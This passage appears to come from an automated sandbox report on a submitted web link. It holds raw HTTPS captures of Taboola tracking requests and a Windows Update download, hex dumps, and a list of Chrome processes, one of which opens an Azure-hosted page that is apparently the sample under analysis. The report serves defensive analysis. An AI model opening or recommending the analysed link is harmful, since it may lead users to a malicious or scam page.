                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://kronemole.site
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://kronemole.site/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:59:07 UTC937INHTTP/1.1 200 OK
                                                                          Connection: close
                                                                          Server: nginx
                                                                          Content-Type: application/json;charset=utf-8
                                                                          P3P: policyref="http://trc.taboola.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
                                                                          Access-Control-Allow-Origin: https://kronemole.site
                                                                          Access-Control-Allow-Credentials: true
                                                                          Set-Cookie: t_gid=9882c26e-c20f-46a2-8d19-526074df1686-tuctc56675b;Version=1;Path=/;Domain=.taboola.com;Expires=Wed, 20-Nov-2024 16:59:07 GMT;Max-Age=31536000;Secure;SameSite=None
                                                                          Set-Cookie: t_pt_gid=9882c26e-c20f-46a2-8d19-526074df1686-tuctc56675b;Version=1;Path=/;Domain=.taboola.com;Expires=Wed, 20-Nov-2024 16:59:07 GMT;Max-Age=31536000;Secure;SameSite=None;Partitioned
                                                                          Accept-Ranges: bytes
                                                                          Date: Tue, 21 Nov 2023 16:59:07 GMT
                                                                          Via: 1.1 varnish
                                                                          X-SERVICE-VERSION: v1
                                                                          X-Served-By: cache-ewr18160-EWR
                                                                          X-Cache: MISS
                                                                          X-Cache-Hits: 0
                                                                          X-Timer: S1700585947.453821,VS0,VE245
                                                                          Vary: Accept-Encoding
                                                                          X-vcl-time-ms: 245
                                                                          transfer-encoding: chunked
                                                                          2023-11-21 16:59:07 UTC938INData Raw: 35 33 0d 0a
                                                                          Data Ascii: 53
                                                                          2023-11-21 16:59:07 UTC938INData Raw: 7b 22 75 73 65 72 22 3a 7b 22 69 64 22 3a 22 39 38 38 32 63 32 36 65 2d 63 32 30 66 2d 34 36 61 32 2d 38 64 31 39 2d 35 32 36 30 37 34 64 66 31 36 38 36 2d 74 75 63 74 63 35 36 36 37 35 62 22 2c 22 69 73 4e 65 77 55 73 65 72 22 3a 74 72 75 65 7d 7d
                                                                          Data Ascii: {"user":{"id":"9882c26e-c20f-46a2-8d19-526074df1686-tuctc56675b","isNewUser":true}}
                                                                          2023-11-21 16:59:07 UTC938INData Raw: 0d 0a
                                                                          Data Ascii:
                                                                          2023-11-21 16:59:07 UTC938INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          53192.168.2.449806151.101.129.444435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:59:08 UTC938OUTGET /2.0/json/smpush-general/user.sync?app.type=web&app.apikey=dd83e155339c3c4626a1a3e8465b50db3024b412 HTTP/1.1
                                                                          Host: api.taboola.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:59:08 UTC939INHTTP/1.1 200 OK
                                                                          Connection: close
                                                                          Server: nginx
                                                                          Content-Type: application/json;charset=utf-8
                                                                          P3P: policyref="http://trc.taboola.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Credentials: true
                                                                          Set-Cookie: t_gid=e64e2ca7-617f-4cfa-8d68-b0ea38e378a4-tuctc56675c;Version=1;Path=/;Domain=.taboola.com;Expires=Wed, 20-Nov-2024 16:59:08 GMT;Max-Age=31536000;Secure;SameSite=None
                                                                          Set-Cookie: t_pt_gid=e64e2ca7-617f-4cfa-8d68-b0ea38e378a4-tuctc56675c;Version=1;Path=/;Domain=.taboola.com;Expires=Wed, 20-Nov-2024 16:59:08 GMT;Max-Age=31536000;Secure;SameSite=None;Partitioned
                                                                          Accept-Ranges: bytes
                                                                          Date: Tue, 21 Nov 2023 16:59:08 GMT
                                                                          Via: 1.1 varnish
                                                                          X-SERVICE-VERSION: v1
                                                                          X-Served-By: cache-lga21943-LGA
                                                                          X-Cache: MISS
                                                                          X-Cache-Hits: 0
                                                                          X-Timer: S1700585948.239404,VS0,VE212
                                                                          Vary: Accept-Encoding
                                                                          X-vcl-time-ms: 212
                                                                          transfer-encoding: chunked
                                                                          2023-11-21 16:59:08 UTC940INData Raw: 35 33 0d 0a
                                                                          Data Ascii: 53
                                                                          2023-11-21 16:59:08 UTC940INData Raw: 7b 22 75 73 65 72 22 3a 7b 22 69 64 22 3a 22 65 36 34 65 32 63 61 37 2d 36 31 37 66 2d 34 63 66 61 2d 38 64 36 38 2d 62 30 65 61 33 38 65 33 37 38 61 34 2d 74 75 63 74 63 35 36 36 37 35 63 22 2c 22 69 73 4e 65 77 55 73 65 72 22 3a 74 72 75 65 7d 7d
                                                                          Data Ascii: {"user":{"id":"e64e2ca7-617f-4cfa-8d68-b0ea38e378a4-tuctc56675c","isNewUser":true}}
                                                                          2023-11-21 16:59:08 UTC940INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          54192.168.2.44980720.114.59.183443
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:59:26 UTC940OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=sRFYfFOdTkn4XB2&MD=7T2tkHb2 HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          2023-11-21 16:59:27 UTC940INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/octet-stream
                                                                          Expires: -1
                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                          MS-CorrelationId: 2625fd62-f577-42d2-8124-dc7aa78de96a
                                                                          MS-RequestId: 6d9c7a6a-dfef-4729-9ae5-6402eddc74c6
                                                                          MS-CV: gRIgSTgzoke1eDiR.0
                                                                          X-Microsoft-SLSClientCache: 2160
                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Tue, 21 Nov 2023 16:59:26 GMT
                                                                          Connection: close
                                                                          Content-Length: 25457
                                                                          2023-11-21 16:59:27 UTC941INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                          Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                          2023-11-21 16:59:27 UTC956INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                          Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                          020406080s020406080100

                                                                          Click to jump to process

                                                                          020406080s0.0050100MB

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:17:58:27
                                                                          Start date:21/11/2023
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                                          Imagebase:0x7ff76e190000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:2
                                                                          Start time:17:58:30
                                                                          Start date:21/11/2023
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2224,i,7768767200719892686,964844701438018418,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff76e190000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:3
                                                                          Start time:17:58:32
                                                                          Start date:21/11/2023
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://adns2.blob.core.windows.net/adns2/21.html#cl/11677_md/2000/2794/2021/49922/7518
                                                                          Imagebase:0x7ff76e190000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true
                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                          No disassembly